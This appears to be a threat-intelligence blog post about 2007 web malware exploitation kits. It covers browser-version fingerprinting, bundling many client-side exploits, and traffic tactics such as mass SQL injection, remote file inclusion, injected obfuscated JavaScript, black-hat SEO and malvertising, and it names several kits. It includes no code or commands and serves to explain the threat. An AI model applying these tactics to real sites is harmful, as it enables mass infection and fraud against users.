In this post I'll discuss the rise of Web malware exploitation kits circa 2007 and offer in-depth discussion on the current and emerging tactics techniques and procedures (TTPs) of the cybercriminals behind it. With cybercriminals continuing to actively rely on the exploitation of patched and outdated vulnerabilities and with end users continuing to actively utilize unpatched and outdated third-party software it shouldn't be surprising that today's botnets remain relatively easy to generate and orchestrate for the purpose of committing financial fraud.
Malicious Economies of Scale literally means utilizing attack techniques and exploitation approaches to efficiently, yet cost and time effectively, infect or abuse as many victims as possible, in a combination with an added layer of improved metrics on the success of the campaigns. What are the most popular web exploitation kits that malicious parties use to achieve this? Which are the most popular vulnerabilities used in the majority of the kits? What are the most popular techniques for embedding malware? This white paper will outline this efficiency-centered attack model, and will cover web application vulnerabilities, client-side vulnerabilities, malvertising and black hat SEO (search engine optimization).
An overview of the threats posed by rising number of malware embedded sites, with a discussion of the exploitation techniques and kits used, as well as detailed summaries of all the high-profile such attacks during 2007.
01. Reaching the Efficiency Scale Through a Diverse Set of Exploited Vulnerabilities
2007 was the year in which client-side vulnerabilities significantly replaced server-side ones as the preferred choice of malicious attackers on their way to achieve the highest possible attack success rate, while keeping their investment in terms of know-how and personal efforts to the minimum. Among the most successful such attacks during 2007 was Storm Worm, the perfect example that the use of outdated and already patched vulnerabilities can result in aggregating the world’s largest botnet according to industry and independent researchers’ estimates. By itself, this attack technique is in direct contradiction with the common wisdom that zero day vulnerabilities are more dangerous than already patched ones, however, the gang behind Storm Worm quickly envisioned this biased statement as false, and by standardizing the exploitation process with the help of outdated vulnerabilities achieved an enormous success.
Years ago, whenever, a vulnerability was found and exploit code released in the wild, malicious attackers used to quickly released a do-it-yourself exploitation kit to take advantage of a single exploit only. Nowadays, that’s no longer the case, since by using a single exploit whether an outdated, or zero day one, they’re significantly limiting the probability for a successful attack, and therefore the more diverse and served on-the-fly is the set of exploits used in an attack, the higher would the success rate be.
What was even more interesting to monitor during 2007, was the rise of high-profile sites serving malware, and the decline of malware coming from bogus ones. From the Massive Embedded Malware Attack at a large Italian ISP to the Bank of India, the Syrian Embassy in the U.K, the U.S Consulate in St. Petersburg, China’s CSIRT, Possibility Media’s entire portfolio of E-zines, to the French government’s site related to Lybia, these trusted web sites were all found to serve malware though an embedded link pointing back to the attacker’s malicious server. Let’s clarify what malicious economies of scale means, and how do they do it.
02. What is malicious economies of scale, and how is it achieved?
Malicious economies of scale is a term I coined in 2007 to summarize the ongoing trend of efficiently attacking online users, by standardizing the exploitation process, and by doing so, not just lowering the entry barriers into the process of exploiting a large number of users, but also, maintaining a rather static success rate of infections. Malicious economies of scale is the efficient way by which a large number of end users get infected, or have their online abused, with the malicious parties maintaining a static attack model. It’s perhaps more important to also describe how is the process achieved at the first place? The first strategy applied has to do with common sense in respect to the most popular software applications present at the end user’s end, and the first touch-point in this case would be the end user’s Internet browser.
Having its version easily detected and exploit served, one that’s directly matching the vulnerable version, is among the web exploitation kits main functionalities. Let’s continue with the second strategy, namely to increase the probability of success. As I’ve already pointed out, do-it-yourself single vulnerability exploiting tools matured into web exploitation malware kits, now backed up with a diverse set of exploits targeting different client-side applications, which in this case is the process of increasing the probability of successful infection. The third strategy has to do with attracting the traffic to the malicious server, that as I’ve already discussed is already automatically set to anticipate the upcoming flood of users and serve the malware through exploiting client-side software vulnerabilities on their end. This is mainly done through exploiting remote file inclusion vulnerabilities within the high-profile targets, or through remotely exploitable web application vulnerabilities to basically embed a single line of code, or an obfuscated javascript that when deobfuscated will load the malicious URL in between loading the legitimate site.
Popular Malware Embedded Attack Tactics
This part of the article will briefly describe some of the most common attack tactics malicious parties use to embed links to their malicious servers on either high-profile sites, or any other site with a high pagerank, something they’ve started measuring as of recently according to threat intell assessment on an automated system to embed links based on a site’s popularity.
- The “pull” Approach – Blackhat SEO, Harnessing the Trusted Audience of a Hacked Site
- The “push” Approach – Here’s Your Malware Embedded Link
- Automatically Exploiting Web Application Vulnerabilities – Mass SQL Injection Attacks
- Malicious Advertisements - Malvertising
Among the most popular traffic acquisition tactics nowadays remain the active utilization of legitimate Web properties for the purpose of socially engineering an ad network provider into featuring a specific malware-serving advertising at the targeted Web site including active Web site compromise for the purpose of injecting rogue and malicious ads on the targeted host.
Related posts:
- Buying Access to Hacked Cpanels or Web Servers
Thanks to a vibrant DIY (do-it-yourself) Web malware exploitation kit culture including the active utilization of various DIY Web site exploitation and malware-generating cybercriminals continue actively utilizing stolen and compromised accounting data for the purpose of injecting malicious scripts on the targeted host further compromising the confidentiality availability and integrity of the targeted host.
- Harvesting accounting data from malware infected hosts
The Most Popular Web Malware Exploitation Kits
Going into detail about the most common vulnerabilities used in the multitude of web malware exploitation kits could be irrelevant from the perspective of their current state of “modularity”, that is, once the default installation of the kit contains a rather modest set of exploits, the possibility to add new exploits to be used has long reached the point’n’click stage. Even worse, localizing the kits to different languages further contributes to their easy of use and acceptance on a large scale, just as is their open source nature making it easy for coders to use a successful kit’s modules as a foundation for a new one – something’s that’s happening already, namely the different between a copycat kit and an original coded from scratch one. Among the most popular malware kits remain :
- A Brief Overview of MPack, IcePack, Zunker, Advanced Pack and Fire Pack
The list is endless, the Nuclear Malware kit, Metaphisher, old version of the WebAttacker and the Rootlauncher kit, with the latest and most advanced innovation named the Random JS Exploitation Kit. Compared to the previous one, this one is going a step beyond the usual centralized malicious server.
With malicious parties now interested in controlling as much infected hosts with as little effort as possible, client-side vulnerabilities will continue to be largely abused in an efficient way thought web malware exploitation kits in 2008. The events that took place during 2007, clearly demonstrate the pragmatic attack approaches malicious parties started applying, namely realizing that an outdated but unpatched on a large scale vulnerability is just as valuable as a zero day one.